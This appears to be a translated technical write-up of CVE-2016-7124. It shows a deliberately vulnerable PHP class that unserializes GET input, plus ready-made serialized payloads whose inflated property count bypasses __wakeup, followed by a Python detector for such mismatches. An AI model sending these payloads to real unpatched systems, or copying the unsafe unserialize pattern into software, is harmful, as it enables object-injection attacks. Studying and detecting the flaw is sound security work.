Last updated: August 28, 2021, 6:40 PM
CVE-2016-7124
Vulnerability principle
When the value in the serialized string that declares the number of properties is larger than the actual number of properties present, execution of the __wakeup function is bypassed.
Affected versions
PHP5 < 5.6.25
PHP7 < 7.0.10
__wakeup bypass on PHP 5.5.9
Suppose we have the following code:
```php
<?php
class User{
    public $username;
    public $password;
    // Runs after unserialize() rebuilds the object (unless bypassed)
    function __wakeup(){
        die("123");
    }
    // Runs when the object is destroyed
    function __destruct(){
        die("456");
    }
}
// Untrusted input is passed straight to unserialize()
$a = $_GET['a'];
$a_unseri = unserialize($a);
var_dump($a_unseri);
?>
```
Construct the object:
```php
<?php
class User{
    public $username = "Lxxx";
    public $password = "lxxx";
}
$a = new User();
// Print the URL-encoded form (for the GET parameter) and the raw form
echo urlencode(serialize($a));
echo "\n";
echo serialize($a);
?>
```
Result:
```
O%3A4%3A%22User%22%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A4%3A%22Lxxx%22%3Bs%3A8%3A%22password%22%3Bs%3A4%3A%22lxxx%22%3B%7D
O:4:"User":2:{s:8:"username";s:4:"Lxxx";s:8:"password";s:4:"lxxx";}
```
Pass it as the parameter in the browser:
```
O%3A4%3A%22User%22%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A4%3A%22Lxxx%22%3Bs%3A8%3A%22password%22%3Bs%3A4%3A%22lxxx%22%3B%7D
```
The result is:

But when we make the declared property count larger than the real one (changing 2 to 3):
```
O:4:"User":2:{s:8:"username";s:4:"Lxxx";s:8:"password";s:4:"lxxx";}
O:4:"User":3:{s:8:"username";s:4:"Lxxx";s:8:"password";s:4:"lxxx";}
```
That is, pass the parameter:
```
O%3A4%3A%22User%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A4%3A%22Lxxx%22%3Bs%3A8%3A%22password%22%3Bs%3A4%3A%22lxxx%22%3B%7D
```
The result is:

This bypasses the __wakeup magic method.
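The defensive counterpart to the walkthrough above, as an added example that is not code from the original post: a small parser for PHP's serialize() format that reports every object whose declared property count differs from the properties actually present, so input shaped like the count-3 payload can be rejected before it reaches unserialize() on an unpatched interpreter. The function names, the supported subset of the format (N, i, b, d, s, a, O) and the sample strings are this example's own assumptions.

```python
import re

# Added example, not code from the original post: walk a PHP serialize() string
# and flag objects whose declared property count does not match the members
# found, which is the shape of the CVE-2016-7124 __wakeup bypass.

_CONTAINER = re.compile(r'(?:a:(\d+)|O:\d+:"([^"]*)":(\d+)):\{')

def _parse(s, i):
    """Parse one value at s[i]; return (value, index after it, mismatch list)."""
    t = s[i]
    if t == 'N':                                   # N;
        return None, i + 2, []
    if t in 'ibd':                                 # i:42;  b:1;  d:1.5;
        end = s.index(';', i)
        conv = {'i': int, 'b': lambda v: v == '1', 'd': float}[t]
        return conv(s[i + 2:end]), end + 1, []
    if t == 's':                                   # s:4:"Lxxx";  (length-prefixed)
        colon = s.index(':', i + 2)
        n = int(s[i + 2:colon])
        start = colon + 2                          # skip the opening :"
        if s[start + n:start + n + 2] != '";':
            raise ValueError('string length does not match at %d' % i)
        return s[start:start + n], start + n + 2, []
    if t in 'aO':                                  # a:2:{...}  O:4:"User":2:{...}
        m = _CONTAINER.match(s, i)
        if not m:
            raise ValueError('malformed container at %d' % i)
        cls, declared, j = m.group(2), int(m.group(1) or m.group(3)), m.end()
        members, issues = {}, []
        while s[j] != '}':                         # key/value pairs up to the closing brace
            k, j, sub = _parse(s, j)
            v, j, sub2 = _parse(s, j)
            members[k] = v
            issues += sub + sub2
        if cls is not None and declared != len(members):
            issues.append((cls, declared, len(members)))
        return (cls, members) if cls is not None else members, j + 1, issues
    raise ValueError('unsupported type %r at %d' % (t, i))

def count_mismatches(serialized):
    """Return [(class, declared, actual), ...] for every object whose counts differ."""
    _, end, issues = _parse(serialized, 0)
    if end != len(serialized):
        raise ValueError('trailing data after value')
    return issues

# Constructed samples: the post's honest payload (count 2) and the inflated one (count 3).
HONEST = 'O:4:"User":2:{s:8:"username";s:4:"Lxxx";s:8:"password";s:4:"lxxx";}'
INFLATED = 'O:4:"User":3:{s:8:"username";s:4:"Lxxx";s:8:"password";s:4:"lxxx";}'
```

Nested objects are checked too, so an inflated count hidden inside an array or another object's property is reported as well.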